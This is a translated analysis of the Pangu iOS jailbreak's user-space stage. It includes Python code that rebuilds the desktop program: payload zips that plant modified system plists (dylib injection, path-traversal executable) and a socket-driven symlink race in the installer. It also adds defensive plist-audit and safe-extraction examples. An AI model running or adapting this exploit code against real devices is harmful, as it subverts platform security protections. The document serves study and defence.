Actions of pangu jailbreak tool in user space

Source: Internet
Author: User
Background

Pangu mainly exploits an iOS installer vulnerability in user space. Here we first list the main steps of installing an application:


The entire installation process is divided into 12 phases; the figure (not reproduced here) shows only the start point, the end point, and the stages that matter for the pangu jailbreak, with the relevant time window marked by a red line. During that window the package is unpacked into a "staging directory". If that directory is replaced by a symbolic link pointing outside the sandbox, the decompression program writes the package's files into the system directory instead. Since the file list of the package is also under the attacker's control, placing a large file at the start of the archive lengthens the decompression and gives time to create the symbolic link while it is running. This is the main vulnerability pangu uses during installation. The following describes the behaviour of pangu in user space.

Main Components

Pangu consists of four parts:
1. Desktop program: provides the resources and controls the jailbreak process.
2. com.pangu.ipa1.ipa: a socket server that works with the desktop program to create the race condition.
3. pangu.dylib: a socket server, the kernel exploit, and installation of the untether and Cydia.
4. pangu.tar: the untether.
This article mainly covers the first two components and the user-space parts of the third.

Workflow

Note: to verify that the analysis is correct, you can re-implement the functions of the pangu desktop program in Python and use the pangu payload to perform the jailbreak. The corresponding sample code for each main phase is shown below.

Phase 1: Install the helper program and obtain the related resources

1. Install com.pangu.ipa1.ipa

# Python 2 sample code. The client classes are assumed to come from the
# pymobiledevice library, whose class names match the helpers used here.
from pymobiledevice.lockdown import LockdownClient
from pymobiledevice.afc import AFCClient

def install_pangu():
    lockdown = LockdownClient()
    afc = AFCClient(lockdown)
    mci = lockdown.startService("com.apple.mobile.installation_proxy")
    file_name = "com.pangu.ipa1.ipa"
    # Upload the IPA into the device's PublicStaging directory over AFC ...
    afc.set_file_contents("/PublicStaging/" + file_name,
                          open("payload/" + file_name, "rb").read())
    # ... then ask installation_proxy to install it and follow the progress replies.
    mci.sendPlist({"Command": "Install", "PackagePath": "/PublicStaging/" + file_name})
    while True:
        status = mci.recvPlist()
        if not status:
            break
        completion = status.get("PercentComplete")
        if completion:
            print "Installing, %s: %s %% Complete" % (file_name, completion)
        if status.get("Status") == "Complete":
            print "Installation %s\n" % status["Status"]
            break
    mci.close()
    afc.stop_session()
    lockdown.stop_session()

First, the AFC service is used to upload the IPA to the device, then the installation proxy service installs the application.

2. Get the caches

# Python 2 sample code. FileRelayClient and CpioArchive are assumed to come
# from the pymobiledevice library (file_relay and util.cpio modules).
import gzip
from io import BytesIO
from pymobiledevice.file_relay import FileRelayClient
from pymobiledevice.util.cpio import CpioArchive

def download_caches():
    fc = FileRelayClient()
    # file_relay returns the requested sources as a gzip-compressed cpio archive.
    data = fc.request_sources(["Caches"])
    fc.stop_session()
    if data:
        file_path = "./payload/caches.gz"
        output_path = "./payload/caches"
        open(file_path, "wb").write(data)
        print "Data saved to: %s" % file_path
        # Read the gzip back in binary mode and unpack the cpio archive inside it.
        with open(file_path, "rb") as f:
            gz = gzip.GzipFile(mode="rb", fileobj=f)
            cpio = CpioArchive(fileobj=BytesIO(gz.read()))
            cpio.extract_files(files=None, outpath=output_path)
    else:
        print "Fail to get caches"
        raise Exception("Fail to get caches")

The file_relay service is called to obtain the caches; the purpose is mainly to obtain com.apple.mobile.installation.plist.

3. Modify com.apple.mobile.installation.plist

The entry for the pangu program is modified as follows:

CFBundleExecutable = "../../../../../../usr/libexec/lockdownd";
EnvironmentVariables = { DYLD_INSERT_LIBRARIES = "/private/var/mobile/Media/Pangu-Install/pangu.dylib"; };

4. Modify Info.plist of the pangu program

CFBundleExecutable = "../../../../../../usr/libexec/lockdownd";

5. Construct applicationState.plist

{ "com.pangu.ipa1" = { SBApplicationAutoLaunchForVoIP = :true; }; }

This causes the pangu program to run automatically after the device restarts.

6. com.apple.LaunchServices-056.csstore is mainly used to update the program list.

7. com.apple.backboardd.plist

From the files above, pangu constructs three payloads:

# Python 2 sample code. get_guid() (the GUID of the installed ipa1.app
# directory) is a helper defined elsewhere and not shown in the article.
from zipfile import ZipFile

# ZipFile.write() strips the leading "/" from the archive name, so the entries
# are stored relative (tmp/bigfile, mobile/Library/...) and are written under
# whatever the installer's staging directory resolves to at extraction time.
# bigfile comes first in every package to lengthen the decompression window.
def generate_upgrade_bundle1():
    guid_str = get_guid()
    with ZipFile("./payload/upgrade1.zip", "w") as payload:
        payload.write("./payload/upgrade_bundle/bigfile", "/tmp/bigfile")
        payload.write("./payload/upgrade_bundle/com.apple.LaunchServices-056.csstore",
                      "/mobile/Library/Caches/com.apple.LaunchServices-056.csstore")
        payload.write("./payload/upgrade_bundle/com.apple.mobile.installation.plist",
                      "/mobile/Library/Caches/com.apple.mobile.installation.plist")
        payload.write("./payload/upgrade_bundle/applicationState.plist",
                      "/mobile/Library/BackBoard/applicationState.plist")
        payload.write("./payload/upgrade_bundle/com.apple.backboardd.plist",
                      "/mobile/Library/Preferences/com.apple.backboardd.plist")
        payload.write("./payload/upgrade_bundle/Info.plist",
                      "/mobile/Applications/" + guid_str + "/ipa1.app/Info.plist")

def generate_upgrade_bundle2():
    with ZipFile("./payload/upgrade2.zip", "w") as payload:
        payload.write("./payload/upgrade_bundle/bigfile", "/tmp/bigfile")
        payload.write("./payload/upgrade_bundle/com.apple.mobile.installation.plist",
                      "/mobile/Library/Caches/com.apple.mobile.installation.plist")

def generate_upgrade_bundle3():
    with ZipFile("./payload/upgrade3.zip", "w") as payload:
        payload.write("./payload/upgrade_bundle/bigfile", "/tmp/bigfile")
        payload.write("./payload/upgrade_bundle/com.apple.LaunchServices-056.csstore",
                      "/mobile/Library/Caches/com.apple.LaunchServices-056.csstore")

At the end of this stage we have three upgrade packages for use in the next stage.
In addition, it can be simply understood that pangu prompts the user to start the program on the phone once this stage is complete.
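The modifications listed in steps 3 to 5 leave a recognisable trace in the device's own bookkeeping files: a CFBundleExecutable that walks out of its .app directory, a DYLD_INSERT_LIBRARIES entry pointing at a dylib under Media, and a third-party app flagged for VoIP auto-launch. The following Python 3 script is an added example, not part of the original article and not pangu's code, showing how an analyst could audit copies of these plists (for instance the ones pulled via file_relay above) for those indicators. It assumes the installation plist has top-level "System" and "User" dictionaries keyed by bundle identifier, and that applicationState.plist is keyed by bundle identifier as in the snippet above; the sample records are constructed inline and the GUID in the paths is a placeholder.

```python
import plistlib

# Environment variables that make dyld load extra code into a process at launch.
INJECTION_ENV_KEYS = {"DYLD_INSERT_LIBRARIES", "DYLD_LIBRARY_PATH", "DYLD_FRAMEWORK_PATH"}


def executable_escapes_bundle(executable):
    """CFBundleExecutable is expected to be a bare file name inside the .app
    directory; any path separator or '..' component means it points elsewhere."""
    return "/" in executable or ".." in executable.split("/")


def audit_app_record(bundle_id, record):
    """Return (bundle_id, finding, evidence) tuples for one app record."""
    findings = []
    exe = record.get("CFBundleExecutable", "")
    if executable_escapes_bundle(exe):
        findings.append((bundle_id, "CFBundleExecutable escapes its bundle", exe))
    env = record.get("EnvironmentVariables") or {}
    for key in sorted(set(env) & INJECTION_ENV_KEYS):
        findings.append((bundle_id, "dyld injection variable", "%s=%s" % (key, env[key])))
    return findings


def audit_installation_plist(plist_bytes):
    """Assumed layout of com.apple.mobile.installation.plist: top-level 'System'
    and 'User' dictionaries keyed by bundle identifier."""
    data = plistlib.loads(plist_bytes)
    findings = []
    for section in ("System", "User"):
        for bundle_id, record in sorted((data.get(section) or {}).items()):
            findings.extend(audit_app_record(bundle_id, record))
    return findings


def autolaunch_apps(application_state_bytes):
    """applicationState.plist is keyed by bundle id; return the ids that request
    auto-launch on boot through the VoIP flag."""
    data = plistlib.loads(application_state_bytes)
    return sorted(b for b, rec in data.items() if rec.get("SBApplicationAutoLaunchForVoIP"))


def sample_installation_plist():
    """Constructed sample: one ordinary app and one record modified the way the
    article describes (executable path traversal plus an injected dylib)."""
    return plistlib.dumps({
        "User": {
            "com.example.notes": {
                "CFBundleExecutable": "Notes",
                "Path": "/private/var/mobile/Applications/<GUID>/Notes.app",
            },
            "com.pangu.ipa1": {
                "CFBundleExecutable": "../../../../../../usr/libexec/lockdownd",
                "Path": "/private/var/mobile/Applications/<GUID>/ipa1.app",
                "EnvironmentVariables": {
                    "DYLD_INSERT_LIBRARIES": "/private/var/mobile/Media/Pangu-Install/pangu.dylib"
                },
            },
        },
        "System": {},
    })


def sample_application_state():
    """Constructed sample matching the applicationState.plist snippet above."""
    return plistlib.dumps({
        "com.example.notes": {},
        "com.pangu.ipa1": {"SBApplicationAutoLaunchForVoIP": True},
    })


if __name__ == "__main__":
    for finding in audit_installation_plist(sample_installation_plist()):
        print(*finding)
    print("auto-launch on boot:", autolaunch_apps(sample_application_state()))
```

Both checks are cheap enough to run over every app record; the CFBundleExecutable rule alone has no legitimate false positives, because a normal record names a file directly inside the .app directory.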

Phase 2: Use the race condition in the installer to set up the environment that executes pangu.dylib

After the user starts the program on the phone, the app starts a socket server and waits for a handshake from the desktop program. The handshake is quite simple: the desktop sends "PING" to the app, and the app replies "PONG". Once the handshake is complete, pangu uses the race condition to install the three payloads constructed above on the phone.
The specific process is to first install an upgrade package through the installation service. While that installation is in progress, the desktop sends "starthook" to the app. Debugging the app shows what the hook does: it creates a symbolic link

"/private/var/tmp/install_staging.eP7ZzJ/foo_extracted" ---> "/var/"

The suffix of the staging directory name varies with each installation.

Sample code:

# Python 2 sample code. get_sock() (the socket to the app on the phone) and
# upgrade_pangu() (installs the named upgrade package via installation_proxy)
# are helpers defined elsewhere and not shown in the article.
def fire_race_condition(lockdown, file_name):
    mci = lockdown.startService("com.apple.mobile.installation_proxy")
    sock = get_sock()
    # Handshake with the app on the phone.
    print "----->PING"
    sock.send("PING")
    msg = sock.recv(4)
    if msg == "PONG":
        print "<-----PONG\n"
    # Start the installation of the upgrade package, then tell the app to
    # create the symbolic link while the package is being unpacked.
    upgrade_pangu(mci, file_name)
    print "----->starthook"
    sock.send("starthook")
    msg = sock.recv(4)
    if msg == "succ":
        print "<-----success\n"
    else:
        print "<-----fail\n"
After installing the three payloads, pangu uploads the following files to the Pangu-Install directory under Media: cydia.tar, packagelist.tar, pangu.dylib, pangu.tar and pangu_ex.tar.
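The weakness exercised in this phase, and described in the Background section, is that the installer's extraction step trusts the staging directory it is writing into: once that directory has been swapped for a symbolic link, entries that are relative by name end up under "/var/". The following Python 3 extractor is an added example written from the defender's side; it is not part of the original article and not Apple's or pangu's code. It rejects absolute and ".." entry names up front and then walks each path one component at a time with O_NOFOLLOW, so a directory that has been replaced by a symlink (even after any earlier check) is refused by the kernel rather than followed. It assumes a POSIX system with dir_fd support such as Linux; the package, the sandbox directory and the stand-in "system" directory are all constructed inline.

```python
import io
import os
import tempfile
import zipfile


def entry_is_safe(name):
    """Static check on an archive entry name: it must be relative and contain
    no '..' component. 'tmp/bigfile' passes; '../x' and '/etc/x' do not."""
    if not name or name.startswith(("/", "\\")) or "\\" in name:
        return False
    parts = [p for p in name.split("/") if p not in ("", ".")]
    return bool(parts) and ".." not in parts


def _open_dir_nofollow(name, dir_fd):
    # O_NOFOLLOW makes the kernel fail the open if 'name' is a symlink, and
    # O_DIRECTORY if it is not a directory. Check and open are one syscall, so a
    # directory swapped for a link between two of our steps cannot be followed.
    return os.open(name, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=dir_fd)


def write_entry_nofollow(root_fd, name, data):
    """Walk from root_fd one component at a time, never following symlinks,
    creating missing directories, and create the final file with O_EXCL."""
    parts = [p for p in name.split("/") if p not in ("", ".")]
    opened = []
    try:
        cur = root_fd
        for comp in parts[:-1]:
            try:
                fd = _open_dir_nofollow(comp, cur)
            except FileNotFoundError:
                os.mkdir(comp, 0o755, dir_fd=cur)
                fd = _open_dir_nofollow(comp, cur)
            opened.append(fd)
            cur = fd
        flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
        out_fd = os.open(parts[-1], flags, 0o644, dir_fd=cur)
        with os.fdopen(out_fd, "wb") as out:
            out.write(data)
    finally:
        for fd in opened:
            os.close(fd)


def safe_extract(zip_bytes, dest):
    """Extract an in-memory zip under dest. Returns (written, rejected), where
    rejected is a list of (entry name, reason)."""
    written, rejected = [], []
    os.makedirs(dest, exist_ok=True)
    root_fd = os.open(dest, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue  # directories are created on demand above
                if not entry_is_safe(info.filename):
                    rejected.append((info.filename, "unsafe entry name"))
                    continue
                try:
                    write_entry_nofollow(root_fd, info.filename, zf.read(info))
                except OSError as exc:
                    rejected.append((info.filename, exc.strerror))
                    continue
                written.append(info.filename)
    finally:
        os.close(root_fd)
    return written, rejected


def demo():
    """Constructed scenario mirroring the article: a package whose entries are
    relative to the staging directory, plus a 'staging' subdirectory that has
    been replaced by a symlink to a directory standing in for the system tree."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mobile/Library/Caches/good.plist", b"<plist/>")  # legitimate
        zf.writestr("../outside.txt", b"x")          # parent-directory name
        zf.writestr("/tmp/bigfile", b"x")            # absolute name
        zf.writestr("staging/planted.txt", b"x")     # would pass through the link
    with tempfile.TemporaryDirectory() as sandbox, tempfile.TemporaryDirectory() as system:
        dest = os.path.join(sandbox, "foo_extracted")
        os.mkdir(dest)
        os.symlink(system, os.path.join(dest, "staging"))  # the swapped directory
        written, rejected = safe_extract(buf.getvalue(), dest)
        leaked = os.path.exists(os.path.join(system, "planted.txt"))
    return written, [name for name, _ in rejected], leaked


if __name__ == "__main__":
    print(demo())
```

The static name check alone would not have helped here, since the payload entries are relative; the per-component O_NOFOLLOW open is what closes the window between checking the staging path and writing into it.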

At this point pangu has essentially finished its user-space work; the interface reports that pangu will restart the device.

Phase 3: Use the vulnerability to install the untether and Cydia

After the device restarts, pangu.dylib is loaded and starts a socket server. Once the desktop program detects that the device has come back up, it sends the message 55aa to pangu.dylib, which then starts installing the untether and Cydia.

Phase 4: Cleaning

When pangu.dylib has finished its work, it sends the code aa55 back to the desktop program. The desktop program then cleans up: it removes the temporary files, deletes the provisioning files, and restores the device time. After cleaning up, the desktop program restarts the device a second time.



